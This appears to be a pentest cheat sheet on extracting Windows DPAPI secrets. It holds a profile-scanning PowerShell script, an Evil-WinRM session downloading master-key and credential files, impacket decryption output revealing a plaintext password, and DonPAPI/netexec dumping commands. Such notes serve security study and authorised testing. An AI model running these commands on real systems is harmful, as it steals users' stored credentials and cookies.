# DPAPI [![ko-fi](https://ko-fi.com/img/githubbutton_sm.svg)](https://ko-fi.com/Y8Y41FQ2GA) The Data Protection Application Programming Interface or [DPAPI](https://docs.microsoft.com/en-us/dotnet/standard/security/how-to-use-data-protection) is a set of APIs in Windows operating systems used to encrypt and decrypt DPAPI data blobs on a per-user basis for Windows OS features and various third-party applications. Here are just a few examples of applications that use DPAPI and what they use it for: | Applications | Use of DPAPI | | --------------------------- | ------------------------------------------------------------------------------------------- | | `Internet Explorer` | Password form auto-completion data (username and password for saved sites). | | `Google Chrome` | Password form auto-completion data (username and password for saved sites). | | `Outlook` | Passwords for email accounts. | | `Remote Desktop Connection` | Saved credentials for connections to remote machines. | | `Credential Manager` | Saved credentials for accessing shared resources, joining Wireless networks, VPNs and more. | ## DPAPI Discovery {% embed url="" %} ```powershell # Function to check if a directory exists and handle access errors silently function Check-Directory { param ([string]$Path) try { if (Test-Path -Path $Path -ErrorAction SilentlyContinue) { return $true } } catch { return $false } return $false } # Function to scan for DPAPI-related paths function Scan-DPAPI { $basePath = "C:\Users" # Check if base path exists if (!(Test-Path $basePath -ErrorAction SilentlyContinue)) { Write-Error "Base path $basePath does not exist!" return } # Get all user directories $userDirs = Get-ChildItem -Path $basePath -Directory -ErrorAction SilentlyContinue | Select-Object -ExpandProperty FullName # List of DPAPI-related paths to check for each user $pathsToCheck = @( "\AppData\Roaming\Microsoft\Protect", # User-specific DPAPI Master Keys "\AppData\Local\Microsoft\Credentials", # Windows Credential Manager "\AppData\Roaming\Microsoft\Vault", # Credential Vault "\AppData\Local\Microsoft\Edge\User Data", # Microsoft Edge Data "\AppData\Roaming\Microsoft\Internet Explorer" # Internet Explorer Data ) # Scan each user directory foreach ($userDir in $userDirs) { Write-Host "Scanning user directory: $userDir" -ForegroundColor Cyan try { # Ensure we can access the user directory if (!(Test-Path $userDir -ErrorAction SilentlyContinue)) { Write-Warning "No permissions on directory of user: $userDir" continue } foreach ($subPath in $pathsToCheck) { $fullPath = Join-Path -Path $userDir -ChildPath $subPath if (Check-Directory -Path $fullPath) { Write-Host "Found DPAPI-related path: $fullPath" -ForegroundColor Green } } } catch { Write-Warning "No permissions on directory of user: $userDir" } } # Check system-wide DPAPI paths $systemPaths = @( "C:\Windows\System32\Microsoft\Protect" # System-Wide DPAPI Keys ) Write-Host "Scanning system-wide paths..." -ForegroundColor Yellow foreach ($sysPath in $systemPaths) { if (Check-Directory -Path $sysPath) { Write-Host "Found DPAPI-related path: $sysPath" -ForegroundColor Green } else { Write-Warning "No permissions or path not accessible: $sysPath" } } } # Run the DPAPI scan Scan-DPAPI ``` ``` .\ScanDPAPI.ps1 Scanning user directory: C:\Users\Administrator Scanning user directory: C:\Users\C.Neri Found DPAPI-related path: C:\Users\C.Neri\AppData\Roaming\Microsoft\Protect Found DPAPI-related path: C:\Users\C.Neri\AppData\Local\Microsoft\Credentials Found DPAPI-related path: C:\Users\C.Neri\AppData\Roaming\Microsoft\Vault Found DPAPI-related path: C:\Users\C.Neri\AppData\Local\Microsoft\Edge\User Data Found DPAPI-related path: C:\Users\C.Neri\AppData\Roaming\Microsoft\Internet Explorer Scanning user directory: C:\Users\c.neri_adm Scanning user directory: C:\Users\Public Scanning system-wide paths... Found DPAPI-related path: C:\Windows\System32\Microsoft\Protect ``` ## Impacket ``` *Evil-WinRM* PS C:\Users\username\Documents> cd C:\Users\C.Neri\AppData\Roaming\Microsoft\Credentials *Evil-WinRM* PS C:\Users\username\AppData\Roaming\Microsoft\Credentials> dir -h Directory: C:\Users\username\AppData\Roaming\Microsoft\Credentials Mode LastWriteTime Length Name ---- ------------- ------ ---- -a-hs- 6/7/2024 5:08 PM 430 C4BB96844A5C9DD45D5B6A9859252BA6 *Evil-WinRM* PS C:\Users\C.Neri\AppData\Roaming\Microsoft\Credentials> download C4BB96844A5C9DD45D5B6A9859252BA6 ``` ``` *Evil-WinRM* PS C:\Users\username\AppData\Roaming\Microsoft\Protect> dir Directory: C:\Users\username\AppData\Roaming\Microsoft\Protect Mode LastWriteTime Length Name ---- ------------- ------ ---- d---s- 6/7/2024 1:17 PM S-1-5-21-4024337825-2033394866-2055507597-1115 ``` ``` *Evil-WinRM* PS C:\Users\username\AppData\Roaming\Microsoft\Protect\S-1-5-21-4024337825-2033394866-2055507597-1115> dir -h Directory: C:\Users\username\AppData\Roaming\Microsoft\Protect\S-1-5-21-4024337825-2033394866-2055507597-1115 Mode LastWriteTime Length Name ---- ------------- ------ ---- -a-hs- 12/4/2024 2:46 AM 740 1fe00192-86ec-4689-a4f2-f8c2336edaf4 -a-hs- 6/7/2024 1:17 PM 740 4dbf04d8-529b-4b4c-b4ae-8e875e4fe847 -a-hs- 6/7/2024 1:17 PM 740 99cf41a3-a552-4cf7-a8d7-aca2d6f7339b -a-hs- 12/4/2024 2:46 AM 24 Preferred *Evil-WinRM* PS C:\Users\username\AppData\Roaming\Microsoft\Protect\S-1-5-21-4024337825-2033394866-2055507597-1115> download 99cf41a3-a552-4cf7-a8d7-aca2d6f7339b ``` User password known - If not[ bruteforce](#bruteforce-masterkey) ``` $ impacket-dpapi masterkey -file 99cf41a3-a552-4cf7-a8d7-aca2d6f7339b -sid S-1-5-21-4024337825-2033394866-2055507597-1115 -password password Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies [MASTERKEYFILE] Version : 2 (2) Guid : 99cf41a3-a552-4cf7-a8d7-aca2d6f7339b Flags : 0 (0) Policy : 0 (0) MasterKeyLen: 00000088 (136) BackupKeyLen: 00000068 (104) CredHistLen : 00000000 (0) DomainKeyLen: 00000174 (372) Decrypted key with User Key (MD4 protected) Decrypted key: 0xf8901b2125dd10209da9f66562df2e68e89a48cd0278b48a37f510df01418e68b283c61707f3935662443d81c0d352f1bc8055523bf65b2d763191ecd44e525a ``` ``` $ impacket-dpapi credential -file C4BB96844A5C9DD45D5B6A9859252BA6 -key 0xf8901b2125dd10209da9f66562df2e68e89a48cd0278b48a37f510df01418e68b283c61707f3935662443d81c0d352f1bc8055523bf65b2d763191ecd44e525a Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies [CREDENTIAL] LastWritten : 2024-06-07 15:08:23 Flags : 0x00000030 (CRED_FLAGS_REQUIRE_CONFIRMATION|CRED_FLAGS_WILDCARD_MATCH) Persist : 0x00000003 (CRED_PERSIST_ENTERPRISE) Type : 0x00000001 (CRED_TYPE_GENERIC) Target : LegacyGeneric:target=admin_acc Description : Unknown : Username : domain\username_adm Unknown : P4ssW0rd0312 ``` ## Bruteforce masterkey {% embed url="" %} ## Tools {% hint style="info" %} *Require Local admin privileges or DA privs* {% endhint %} ### dploot {% embed url="" %} dploot {% endembed %} ### Donpapi `exegol-CPTS /workspace # DonPAPI "$DOMAIN"/"$USER":"$PASSWORD"@"$TARGET"` ### Netexec - CME {% content-ref url="../tools/netexec-cme" %} [netexec-cme](https://0xss0rz.gitbook.io/0xss0rz/pentest/tools/netexec-cme) {% endcontent-ref %} ``` nxc smb -u user -p password --dpapi ``` ``` nxc smb -u user -p password --dpapi cookies ``` ``` nxc smb -u user -p password --dpapi nosystem ``` {% embed url="" %} ### dpapidump.py {% embed url="" %} {% embed url="" %}